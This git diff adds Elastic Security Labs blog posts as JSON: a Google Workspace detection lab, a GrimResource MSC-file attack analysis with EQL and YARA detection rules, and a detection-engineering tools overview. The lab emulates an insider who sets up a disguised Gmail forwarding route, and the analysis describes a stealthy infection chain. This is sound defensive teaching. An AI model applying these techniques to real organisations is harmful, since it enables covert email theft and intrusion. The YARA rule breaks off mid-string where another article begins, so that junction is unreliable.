Agent policy: Google Workspace\n10. Select “Save and Continue”\n11. Select “Save and deploy changes”\n\nOnce completed, your GW integration should be assigned to your GW policy with one agent assigned this policy.\n\n\n\nTo recap, in our Elastic Stack setup so far we have completed the following:\n\n- Deployed an Elastic Stack\n- Created a Fleet policy\n- Set up a lightweight Linux endpoint\n- Deployed an Elastic agent to the Linux endpoint\n- Enabled the Google Workspace integration inside our Fleet policy\n\n### Confirm Google Workspace Data Ingestion\n\nRather than rely on the detection engineering (DE) higher powers, let’s take a second to actually confirm GW data is being ingested into our stack as expected at this point. We can rely on the Discover feature of the Elastic Stack, which allows us to search specific criteria across existing ECS documents. For this, we will use the filter criteria `data_stream.dataset : \"google_workspace.*\"` to look for any ECS documents that originate from a Google Workspace datastream.\n\n\n\nIf you do not have any results, generate some activity within your GW such as creating new users, enabling email routes, creating new Organizational Units (OU) and so forth, then refresh this query after the 10-minute window has passed.\n\n\n\nIf results are found, congratulations are in order because you now have a fully functional threat detection lab for Google Workspace with Elastic Security for SIEM!\n\n## Enable Google Workspace Detection Rules\n\nAs stated earlier, Elastic has 600+ pre-built detection [rules](https://github.com/elastic/detection-rules/tree/main/rules/integrations/google_workspace) not only for Windows, Linux, and macOS endpoints, but also for several integrations, including GW. 
You can view our current existing GW rules and MITRE ATT&CK [coverage](https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-google_workspaceWILDCARD.json&leave_site_dialog=false&tabs=false).\n\nTo enable GW rules, complete the following in the Elastic Stack:\n\n1. Navigation menu \\> Security \\> Manage \\> Rules\n2. Select “Load Elastic prebuilt rules and timeline templates”\n3. Once all rules are loaded:\n4. Select “Tags” dropdown\n5. Search “Google Workspace”\n6. Select all rules \\> Build actions dropdown \\> Enable\n\n\n\nWhile we won’t go in-depth about exploring all rule information, we recommend doing so. Elastic has some additional information such as related integrations, investigation guides and more! Also, you can contribute back to the community by [creating your own detection rule](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) with the “Create new rule” button, and [contribute](https://github.com/elastic/detection-rules#how-to-contribute) to our detection rules repository.\n\n## Let’s Trigger a Pre-Built Rule\n\nFor this example, we will provoke the [Google Workspace Custom Admin Role Created](https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml) detection rule. In our GW admin console, visit Account \\> Admin roles and create a new role with the following information:\n\n1. Name: Curator\n2. Description: Your Choice\n3. Admin console privileges:\n4. Alert Center: Full Access\n\n\n\nNow, we aren’t entirely sure why the Curator role would have access to our Alert Center, but the role seems either improperly scoped or someone wants to have the ability to potentially silence some alerts before our security team can investigate them. 
While the creation of administrative accounts ([T1136.003](https://attack.mitre.org/techniques/T1136/003/)) is not unusual, they should always be investigated if unexpected to ensure cloud roles ([T1098.003](https://attack.mitre.org/techniques/T1098/003/)) are properly scoped.\n\nTo view our detection alert, in your Elastic Stack, visit Navigation Menu \\> Security \\> Alerts and the following should show your alerts. From this, we can see that our rule triggered as well as [Google Workspace API Access Granted via Domain-Wide Delegation of Authority](https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.toml).\n\n\n\nIf we select “View details” from the actions column, we receive a pop-out panel showing the alert overview, tabled data fields and values from our ECS document, as well as the raw JSON.\n\n\n\nMost detection rules for GW can be developed with a few consistent fields such as those we describe in our [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html), making new rules easier to create. 
If you would like to view all data fields for GW that the ECS schema contains, you can find that information [here](https://www.elastic.co/guide/en/beats/filebeat/current/exported-fields-google_workspace.html).\n\n## Let’s Trigger a Custom Rule\n\nWhile pre-built detection rules are great for having threat coverage during onboarding, maybe you would like to search your data and create a new custom rule tailored to your environment.\n\nSince the Elastic Stack is bundled with additional searching capabilities, we can rely on the Analytics [Discover](https://www.elastic.co/guide/en/kibana/current/discover.html) feature to start searching through our raw data for GW-related documents by visiting Navigation Menu \\> Analytics \\> Discover.\n\nFrom here, we can change our data view to logs-\\* and then do an open-ended KQL query for `event.dataset: google_workspace*`, which will return all documents where the source is from GW. You can then either start tabling the data based on available fields or view details about each document.\n\n\n\nThis is important to understand because it influences rule development. Rules are often prototyped as a data reduction exercise, beginning very broad and being refined over time into an effective rule. If you are having difficulty after this exercise with creating detection logic, our [philosophy](https://github.com/elastic/detection-rules/blob/main/PHILOSOPHY.md) on doing so may be of assistance.\n\nFirst, we will add a user with administrative access, Ray Arnold, to our organization. With our Ray Arnold account, we will generate some suspicious events in GW, such as creating a custom email route for Gmail that forwards email destined for our primary administrator (Terrance) to Ray Arnold. In this scenario, we are focused on potential collection of sensitive information via an email forwarding rule ([T1114.003](https://attack.mitre.org/techniques/T1114/003/)).\n\nComplete the following steps:\n\n1. 
Add Ray Arnold as a user:\n2. Navigate to the users settings in GW\n3. Select “add new user”\n4. First name: Ray\n5. Last name: Arnold\n6. Select “ADD NEW USER”\n7. Add Engineers group and make Ray Arnold the owner:\n8. Navigate to groups settings in GW\n\nYou can configure the following settings like these examples:\n\n1. Group name: Engineers\n2. Group email: [engineering@dejesusarcheology.com](mailto:engineering@dejesusarcheology.com)\n3. Group Description: Engineering group at dinosaur park who are responsible for technology and feeding velociraptors.\n4. Group owners: [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com)\n5. Labels: Mailing and Security\n6. Who can join the group: Only invited users\n7. Select “Create Group”\n\nNow we assign admin roles and privileges to Ray Arnold:\n\n1. Navigate to Ray Arnold’s user account\n2. Select “Admin roles and privileges” \\> Assign Roles\n3. Super Admin -\\> Assigned\n4. Groups Admin -\\> Assigned\n5. Services Admin -\\> Assigned\n6. Select “Save”\n\n\n\nIf done correctly, Ray Arnold should be a new user in GW for the DeJesus’ Archeology organization. He is also the owner of the Engineers group and has Super Admin, Groups Admin and Services Admin roles assigned to his account. Following this, we need to log in to the GW admin console with Ray Arnold’s account and add a custom email route.\n\nThis provides our organization with an insider threat scenario. Ray Arnold was hired as an employee with authorization and authentication to GW admin console settings. Our organization trusts Ray Arnold to fulfill the requirements agreed to during the hiring process in exchange for compensation. Risk mitigation is then up to the administrator when scoping the proper permissions and roles applied to Ray Arnold.\n\n\n\nComplete the following:\n\n1. Log in to the admin console with Ray Arnold’s account\n2. Select Navigation Menu \\> Apps \\> Google Workspace \\> Gmail \\> Routing\n3. Select Configure for “Routing”\n4. 
Enter the following information\n5. Description: Default administrator spam filtering\n6. Email messages to affect: Inbound, Outbound, Internal - Sending, Internal - Receiving\n7. Also deliver to: [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com)\n8. Account types to affect: Users\n9. Envelope filter: Only affect specific envelope recipients (Email address: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com))\n\nNow we can test our custom email route by sending [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) an email from a separate account (we created a random email account with Proton) that discusses private details about new Paleo-DNA. Once you send an email, you can view Ray Arnold’s Gmail and see that this private email was additionally routed to [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com), where we now have an existing insider threat potentially selling private information about our Paleo-DNA tests to competitors. This we cannot allow!\n\n\n\n### Identify a Potential Detection Rule for Custom Gmail Routes\n\nLuckily, we have the Elastic Stack on our side to help us thwart this potential insider threat by detecting custom Gmail route creations! Within your Elastic Stack, visit Navigation Menu \\> Analytics \\> Discover and let’s start creating our KQL query. Below are the query filters we should be looking for and the final query.\n\nKQL query: `event.dataset: google_workspace.admin and event.action: \"CREATE_GMAIL_SETTING\" and not related.user: terrance and google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)`\n\nLet’s break this down further to explain what we are looking for:\n\n`event.dataset: google_workspace.admin` - Documents in ECS where the data is sourced from GW, specifically admin reporting. 
Since a user needs to be an administrator, we should expect the data to be sourced from admin reporting, which may also indicate a compromised admin account or abuse of an admin account not set up with the principle of least privilege (PoLP).\n\n`event.action: \"CREATE_GMAIL_SETTING\"` - The creation of a Gmail setting, which is typically done by administrators.\n\n`not related.user: terrance` - Matches any creation of a Gmail setting by an administrator whose username is not “terrance”, the only administrator expected to be changing such settings.\n\n`google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)` - These setting names are specific to Gmail routing rules.\n\nPlugging this query into Discover, we have matching documents for this activity being reported in GW!\n\n\n\n### Create a Custom Rule in the Security Feature\n\nLet’s wrap this up by adding our custom detection rule for this activity!\n\nTo add your custom rule, complete the following:\n\n1. In your Elastic Stack, select Navigation menu \\> Security \\> Manage \\> Rules\n2. Select “Create new rule”\n3. Enter the following information:\n4. Define rule: Source, Index Patterns: logs-google_workspace\\*\n5. Custom query: Our custom query\n\nAnd we define rule metadata:\n\n1. Name: Google Workspace Custom Forwarding Email Route Created\n2. Description: Your choice\n3. Default severity: High\n4. Tags: Google Workspace\n\nWhat is fantastic about this custom rule is that we can send a notification via our platform of choice, so we are notified immediately when the alert is triggered.\n\n\n\nThen select “Create & enable rule” at the bottom to create your custom rule. If we replay the steps above to create a custom Gmail forwarding rule, we will now see an alert and receive a notification about the alert trigger!\n\n\n\nAt this point, we are now aware that Ray Arnold has created a custom Gmail route rule in GW without authorization. 
From our alert in the Elastic Stack and notification to the CEO, we can now take action to mitigate further risk.\n\n## Takeaways\n\nAs demonstrated, Elastic’s security solution and the Elastic Stack allow us to ingest GW reporting logs and scan this data with pre-built detection rules or custom rules. Combine this with other features of the stack such as [Enterprise Search](https://www.elastic.co/enterprise-search), [Observability](https://www.elastic.co/observability), and a very simple cloud stack deployment process and we can start detecting threats in our GW environment in no time.\n\nIt’s been quite a journey and you have accomplished an incredible amount of work. In part three of this series: Detecting Common Threats, we will emulate some common Google Workspace abuse by threat actors and create more advanced detection logic for these. Hold on tight, because it's about to get WILD.\n\nAlso, there is still so much more to explore within the Elastic Stack, as you have probably already found during this lab, so feel free to explore! Elastic continues to take action on security transparency as [recently](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security) discussed.\n\nHopefully this provides you with a better understanding of the powerful capabilities within the Elastic Stack and how to use it to detect potential threats in GW. Thanks for reading/following along and may we all be in the capable hands of detection engineers in part three.\n"
+ },
+ "title": "Google Workspace Attack Surface",
+ "slug": "google-workspace-attack-surface-part-two",
+ "subtitle": "Part Two: Setup Threat Detection With Elastic",
+ "date": "2023-01-03",
+ "description": "During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-01-e.jpg",
+ "category": null,
+ "tags": [
+ "threat detection",
+ "cloud security",
+ "google workspace",
+ "google cloud"
+ ]
+ },
+ "id": "security_labs_content-google_workspace_attack_surface_part_two-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-grimresource-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-grimresource-md.json
new file mode 100644
index 00000000000..e8f7cf0e560
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-grimresource-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"GrimResource - Microsoft Management Console for initial access and evasion\"\nslug: \"grimresource\"\ndate: \"2024-06-22\"\nsubtitle: \"Adversaries adapting to Microsoft's new security landscape\"\ndescription: \"Elastic researchers uncovered a new technique, GrimResource, which allows full code execution via specially crafted MSC files. It underscores a trend of well-resourced attackers favoring innovative initial access methods to evade defenses.\"\nauthor:\n - slug: joe-desimone\n - slug: samir-bousseaden\nimage: \"grimresource.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - grimresource\n - mcc\n - msc\n---\n\n## Overview\n\nAfter Microsoft [disabled](https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity. However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Mature attackers seek to leverage new and undisclosed infection vectors to gain access while evading defenses. A [recent example](https://www.genians.co.kr/blog/threat_intelligence/facebook) involved DPRK actors using a new command execution technique in MSC files.\n\nElastic researchers have uncovered a new infection technique also leveraging MSC files, which we refer to as GrimResource. It allows attackers to gain full code execution in the context of `mmc.exe` after a user clicks on a specially crafted MSC file. 
A [sample](https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb) leveraging GrimResource was first uploaded to VirusTotal on June 6th.\n\n## Key takeaways\n\n* Elastic Security researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource\n* GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (`mmc.exe`) with minimal security warnings, ideal for gaining initial access and evading defenses\n* Elastic is providing analysis of the technique and detection guidance so the community can protect themselves \n\n## Analysis\n\nThe key to the [GrimResource](https://gist.github.com/joe-desimone/2b0bbee382c9bdfcac53f2349a379fa4) technique is using an old [XSS flaw](https://medium.com/@knownsec404team/from-http-domain-to-res-domain-xss-by-using-ie-adobes-pdf-activex-plugin-ba4f082c8199) present in the `apds.dll` library. By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of `mmc.exe`. Attackers can combine this technique with [DotNetToJScript](https://github.com/tyranid/DotNetToJScript/tree/master) to gain arbitrary code execution.\n\n\n\nAt the time of writing, the sample identified in the wild had 0 static detections in [VirusTotal](https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb/details).\n\n\n\nThe sample begins with a transformNode obfuscation technique, which was observed in recent but unrelated [macro samples](https://twitter.com/decalage2/status/1773114380013461799). 
This aids in evading ActiveX security warnings.\n\n\n\nThis leads to an obfuscated embedded VBScript, as reconstructed below:\n\n\n\nThe VBScript sets the target payload in a series of environment variables and then leverages the [DotNetToJs](https://github.com/tyranid/DotNetToJScript/blob/master/DotNetToJScript/Resources/vbs_template.txt) technique to execute an embedded .NET loader. We named this component PASTALOADER and may release additional analysis on this specific tool in the future.\n\n\n\n\n\nPASTALOADER retrieves the payload from environment variables set by the VBScript in the previous step:\n\n\n\nFinally, PASTALOADER spawns a new instance of `dllhost.exe` and injects the payload into it. This is done in a deliberately stealthy manner using the [DirtyCLR](https://github.com/ipSlav/DirtyCLR/tree/7b1280fee780413d43adbad9f4c2a9ce7ed9f29e) technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.\n\n\n\n## Detections\n\nIn this section, we will examine current behavior detections for this sample and present new, more precise ones aimed at the technique primitives.\n\n### Suspicious Execution via Microsoft Common Console\n\nThis detection was established prior to our discovery of this new execution technique. 
It was originally designed to identify a [different method](https://www.genians.co.kr/blog/threat_intelligence/facebook) (which requires the user to click on the Taskpad after opening the MSC file) that exploits the same MSC file type to execute commands through the Console Taskpads command line attribute:\n\n\n\n```\nprocess where event.action == \"start\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and process.parent.args : \"*.msc\" and\n not process.parent.args : (\"?:\\\\Windows\\\\System32\\\\*.msc\", \"?:\\\\Windows\\\\SysWOW64\\\\*.msc\", \"?:\\\\Program files\\\\*.msc\", \"?:\\\\Program Files (x86)\\\\*.msc\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\")\n```\nIt triggers here because this sample opted to spawn and inject a sacrificial instance of dllhost.exe:\n\n\n\n### .NET COM object created in non-standard Windows Script Interpreter\n\nThe sample is using the [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) technique, which triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine (Jscript or Vbscript):\n\nThe following EQL rule will detect execution via the .NET loader:\n\n```\napi where\n not process.name : (\"cscript.exe\", \"wscript.exe\") and\n process.code_signature.trusted == true and\n process.code_signature.subject_name : \"Microsoft*\" and\n process.Ext.api.name == \"VirtualAlloc\" and\n process.Ext.api.parameters.allocation_type == \"RESERVE\" and \n process.Ext.api.parameters.protection == \"RWX\" and\n 
process.thread.Ext.call_stack_summary : (\n /* .NET is allocating executable memory on behalf of a WSH script engine\n * Note - this covers both .NET 2 and .NET 4 framework variants */\n \"*|mscoree.dll|combase.dll|jscript.dll|*\",\n \"*|mscoree.dll|combase.dll|vbscript.dll|*\",\n \"*|mscoree.dll|combase.dll|jscript9.dll|*\",\n \"*|mscoree.dll|combase.dll|chakra.dll|*\"\n)\n```\n\nThe following alert shows `mmc.exe` allocating RWX memory, and the `process.thread.Ext.call_stack_summary` captures the origin of the allocation from `vbscript.dll` to `clr.dll`: \n\n\n\n### Script Execution via MMC Console File \n\nThe two previous detections were triggered by specific implementation choices to weaponize the GrimResource method (DotNetToJS and spawning a child process). These detections can be bypassed by using more OPSEC-safe alternatives.\n\nOther behaviors that might initially seem suspicious — such as `mmc.exe` loading `jscript.dll`, `vbscript.dll`, and `msxml3.dll` — can be clarified by comparing them to benign data. We can see that, except for `vbscript.dll`, these WSH engines are typically loaded by `mmc.exe`: \n\n\n\nThe core aspect of this method involves using [apds.dll](https://strontic.github.io/xcyclopedia/library/apds.dll-DF461ADCCD541185313F9439313D1EE1.html) to execute Jscript via XSS. 
This behavior is evident in the mmc.exe Procmon output as a `CreateFile` operation (`apds.dll` is not loaded as a library):\n\n\n\n\n\nWe added the following detection using Elastic Defend file open events where the target file is `apds.dll` and the `process.name` is `mmc.exe`: \n\nThe following EQL rule will detect the execution of a script from the MMC console:\n\n```\nsequence by process.entity_id with maxspan=1m\n [process where event.action == \"start\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and process.args : \"*.msc\"]\n [file where event.action == \"open\" and file.path : \"?:\\\\Windows\\\\System32\\\\apds.dll\"]\n```\n\n\n\n### Windows Script Execution via MMC Console File\n\nAnother detection and forensic artifact is the creation of a temporary HTML file in the INetCache folder, named `redirect[*]` as a result of the APDS [XSS](https://owasp.org/www-community/attacks/xss/) redirection:\n\n\n\nThe following EQL correlation can be used to detect this behavior while also capturing the msc file path: \n\n```\nsequence by process.entity_id with maxspan=1m\n [process where event.action == \"start\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and process.args : \"*.msc\"]\n [file where event.action in (\"creation\", \"overwrite\") and\n process.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and file.name : \"redirect[?]\" and \n file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\\\\redirect[?]\"]\n```\n\n\n\nAlongside the provided behavior rules, the following YARA rule can be used to detect similar files:\n\n```\nrule Windows_GrimResource_MMC {\n meta:\n author = \"Elastic Security\"\n reference = \"https://www.elastic.co/security-labs/GrimResource\"\n reference_sample = \"14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb\"\n arch_context = \"x86\"\n scan_context = \"file, memory\"\n license = \"Elastic License v2\"\n os = \"windows\"\n 
strings:\n $xml = \"). The playground takes advantage of the native Security [Timeline](https://www.elastic.co/guide/en/security/current/timelines-ui.html) correlation capabilities, and provides notes to enable learning EQL. The playground is a publicly available Elastic Security instance, pre-populated with suspicious events generated from a Sofacy group [payload](https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/). The only thing you need to access the site is a browser!\n\n\n\nEssentially, you’re presented with a dataset representative of threat activity, similar to what we rely on to build our detection rules and endpoint artifacts. This event data can then be leveraged to generate your own detection logic. It also provides a small introduction to the Elastic Security Stack, and gives you an opportunity to play with some of the cool features available (e.g. Analyzer). The visual event [Analyzer](https://www.elastic.co/guide/en/security/current/visual-event-analyzer.html) shows a graphical representation of a process tree, containing alerts and suspicious events detected by our Elastic Security Endpoint, and illustrates process lineage that can be used within a query.\n\n\n\nWe can use this information to understand how the adversary behavior works, and develop a query capable of identifying future malicious activity. For example, should Outlook spawn an explorer.exe child process? Explore the EQLPlayground, EQL [syntax](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html), and [APIs](https://www.elastic.co/guide/en/elasticsearch/reference/8.3/eql-apis.html). In the correlation view [introduced](https://www.elastic.co/blog/whats-new-elastic-security-7-12-0-analyst-driven-correlation-ransomware-prevention) with Elastic Security 7.12, you’ll have the opportunity to insert EQL and develop a query with your special sauce to detect the malicious behavior we’ve executed. 
You’ll also be able to look at each available field, and the data stream required to capture these events within your Stack.\n\n\n\nAs you can see, there is an example placeholder query, but you have full access to modify the query based on the full event captured and come up with the best detection. Is there something suspicious about the process tree? What about the sequence of events? Is there something fishy about rundll32.exe (a commonly used [execution proxy](https://attack.mitre.org/techniques/T1218/011/)) making external network calls?\n\n```\nsequence by process.entity_id with maxspan=10s\n[process where process.name : \"rundll32.exe\" and event.type == \"start\"]\n[network where process.name : \"rundll32.exe\" and not cidrmatch(destination.ip, \"10.0.0.0/8\", \"172.16.0.0/12\", \"192.168.0.0/16\", \"127.0.0.0/8\")]\n```\n\nWe’d love to see what cool and clever queries you’ve come up with, and if you have ideas for new rules, check out our [CONTRIBUTING.md](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md) guide and submit a [new rule](https://github.com/elastic/detection-rules/issues/new?assignees=&labels=Rule%3A+New&template=new_rule.md&title=%5BNew+Rule%5D+Name+of+rule). For now, we’ll use this query in creating a rule with the detection-rule CLI.\n\n# Red Team Automation (RTA)\n\nOne of the ways we automate testing Elastic’s ruleset is by launching RTA scripts that simulate threat behaviors. If you are unfamiliar with RTA, it is an open-source tool used by TRaDE to generate suspicious activity and unit test rules across multiple Stack releases. 
We encourage you to check out the [2018 post](https://www.elastic.co/blog/introducing-endgame-red-team-automation) by [Devon Kerr](https://www.linkedin.com/in/devonkerr/), which introduced the capability.\n\nSometimes folks ask our team for sample data, methods to generate suspicious events to baseline configurations, or a testing environment with many alerts already generated in the Elastic Stack. We also regression test rules to validate new features added to the SIEM or Endpoint agent, any modifications based on rule tuning, or for maintenance. This process can become time-consuming with hundreds of rules to test across multiple Stack versions.\n\nIn the latest 8.4 dev cycle, we spent some time generating new macOS, Linux, and Windows RTAs. Consistent with the openness theme, we migrated our endpoint behavior tests to the Detection Rules [repo](https://github.com/elastic/detection-rules/tree/main/rta) for the community! Current RTA development is focused on endpoint behavior, and we continue to expand the coverage of our rulesets with new RTAs, so look forward to even more RTAs in the not-too-distant future.\n\n\n\nOnce you’ve cloned the detection-rules repo, you’ll be able to list all available tests. Each RTA includes helpful metadata like the platform the RTA supports, the triggered rules that will alert, and the Python code that generates suspicious activity on the target system. The [common](https://github.com/elastic/detection-rules/blob/main/rta/common.py) import is packed with useful functions to simplify creating new RTAs. For example, it provides helper functionality to temporarily edit the Windows registry, check that the required operating system is running the RTA, or even execute terminal commands. Essentially, it abstracts a lot of the common activity needed across the RTA set in order to simplify the development of new RTAs, especially for those less familiar with Python. 
The RTA library was designed to use only stdlib Python packages so that no external dependencies would be required. Using only core libraries is greatly beneficial when testing in segmented environments.\n\n\n\nIn the above example, the RTA generates activity to trigger the [Suspicious Emond Child Process](https://github.com/elastic/detection-rules/blob/main/rules/macos/persistence_emond_rules_process_execution.toml) SIEM and [Potential Persistence via Emond](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_potential_persistence_via_emond.toml) endpoint behavior rules. The RTA creates a bash shell process spawned from a parent process called emond. We aim to make repeatable yet non-destructive test cases to reuse testing infrastructure as much as possible between unit tests. There are many approaches to generating suspicious events that would trigger these rules, so if you’d like to contribute your creative ideas, feel free to submit a pull request to the [detection-rules](https://github.com/elastic/detection-rules) repo!\n\n# Detection Rules CLI\n\nThe detection-rules CLI is a development-tool Swiss Army knife that we use to manage and test whether our rules pass validation, but there are useful commands that you can use to speed up rule testing in your own environment. If you’re familiar with Python 3, getting started with the Detection Rules CLI commands will only take a few steps. It has useful commands like `view-rule`, which shows the rule as a JSON object in the format expected by Kibana. Conveniently, the command also validates while loading; if you ever want to test that your TOML file matches our schema quickly, you can use this command.\n\n\n\nAfter you have installed the package [dependencies](https://github.com/elastic/detection-rules#getting-started) and set up your credential configuration, you’re ready to use the CLI. 
One of the cool things about using the CLI is the ability to download data while testing an RTA using the `collect-events` command.\n\n\n\nOnce you start collecting events, the CLI command will idle until you're ready to save events. While you wait, you have an opportunity to jump onto the target machine, execute an RTA, detonate a malware sample, or launch any payloads to trigger an alert. These events can be stored offline and reused later in an automated testing process. With the `collect-events` command, you can apply several options that scope your exports, like specifying the index and specific [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) of the target system you want. Once the command starts, it gathers all events associated with the host until you’re ready to stop the collection.\n\n\n\nAs you can see, it’s possible to run the `collect-events` command, generate malicious activity on a target system (e.g., using an RTA), and download the events locally for review. Some users export and use these events as-is, but we intend to store these events to help automate and streamline our end-to-end testing process.\n\nApart from the `es` (Elasticsearch) function, we often use several other options like linting our ruleset with `toml-lint`, validating our rules with `validate-all`, or even surveying our ruleset against alerts with in-development commands buried deep within our dev CLI section like `rule-survey`. If you’re interested in reading more about the other fields available, see our guide on [creating a rule with the CLI](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md#creating-a-rule-with-the-cli) or the [CLI.md](https://github.com/elastic/detection-rules/blob/main/CLI.md). 
As always, if you have any questions or need help, feel free to submit an issue.\n\nTools like the EQLPlayground, RTAs, and detection-rules CLI are great resources for getting started with EQL, threat hunting, and detection engineering, respectively. Coupled with the detection-rules CLI and RTAs, these tools give security research engineers immediate feedback to begin managing their custom Elastic detection rules. Whether you’re using a cloud Elastic Stack, a local deployment, or are setting up a lab environment with our newly released [Elastic Container Project](https://www.elastic.co/security-labs/the-elastic-container-project), we’ve got you covered. These are just a few tools we use that you're welcome to try out for your internal workflows; they help us test and create rules every day.\n\nIn a following article of TRaDE craft, we’ll describe how we validate our rules across languages like EQL or KQL, and how we automate our end-to-end process. Additionally, if you’re interested in hearing how our partners at Tines have integrated Elastic detection logic, check out their blog on [Automating Detection-as-Code](https://www.tines.com/blog/automating-detection-as-code), which walks through the Elastic SIEM, detection content development CI/CD, alert management, and response handling.\n\nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/protections-artifacts/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!\n"
+ },
+ "title": "Handy Elastic Tools for the Enthusiastic Detection Engineer",
+ "slug": "handy-elastic-tools-for-the-enthusiastic-detection-engineer",
+ "date": "2022-09-12",
+ "description": "Tools like the EQLPlayground, RTAs, and detection-rules CLI are great resources for getting started with EQL, threat hunting, and detection engineering, respectively.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ }
+ ],
+ "image": "security-threat-monitoring-compliance-1200x628.jpg",
+ "category": null,
+ "tags": [
+ "python",
+ "eql",
+ "rta",
+ "detection-rules",
+ "eqlplayground"
+ ]
+ },
+ "id": "security_labs_content-handy_elastic_tools_for_the_enthusiastic_detection_engineer-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_lateral_movement_using_event_query_language-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_lateral_movement_using_event_query_language-md.json
new file mode 100644
index 00000000000..228d2b1cd61
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_lateral_movement_using_event_query_language-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting for Lateral Movement using Event Query Language\"\nslug: \"hunting-for-lateral-movement-using-event-query-language\"\ndate: \"2023-03-01\"\ndescription: \"Elastic Event Query Language (EQL) correlation capabilities enable practitioners to capture complex behavior for adversary Lateral Movement techniques. Learn how to detect a variety of such techniques in this blog post.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"blog-thumb-security-honeycomb.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\n---\n\n[Lateral Movement](https://attack.mitre.org/tactics/TA0008/) describes techniques that adversaries use to pivot through multiple systems and accounts to improve access to an environment and subsequently get closer to their objective. Adversaries might install their own remote access tools to accomplish Lateral Movement, or use stolen credentials with native network and operating system tools that may be stealthier in blending in with normal systems administration activity.\n\nDetecting Lateral Movement behaviors often involves the design of detections at both the source and the target system, as well as the correlation of more than one type of event (such as network events with process execution events) in order to capture the remote execution context.\n\nIn this blog, we explore some examples of techniques and leverage the capabilities of Elastic’s [Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) to design behavioral hunts and detections.\n\n## **How Lateral Movement works**\n\nLateral Movement is usually composed of the following high-level steps:\n\n1. Remote authentication to the target host (valid access credentials are required)\n2. Staging the command to execute to the remote host or to another resource accessible by the target host such as internet URL or a Network File Share\n3. 
